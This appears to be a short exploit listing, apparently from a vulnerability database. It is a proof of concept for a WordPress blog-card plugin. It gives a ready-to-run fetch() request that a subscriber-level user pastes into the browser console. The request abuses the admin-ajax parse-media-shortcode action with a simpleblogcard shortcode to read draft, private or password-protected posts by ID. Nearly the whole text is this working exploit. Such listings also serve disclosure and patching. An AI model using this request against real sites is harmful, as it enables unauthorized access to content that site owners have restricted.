## https://sploitus.com/exploit?id=WPEX-ID:DE3E1718-C358-4510-B142-32896FFEB03F
Run the below command in the developer console of the web browser while being on the blog as a subscriber user
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "POST",
"body": "action=parse-media-shortcode&shortcode=[simpleblogcard url='?p=53']",
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));
53 being the ID of a draft/private/password protected post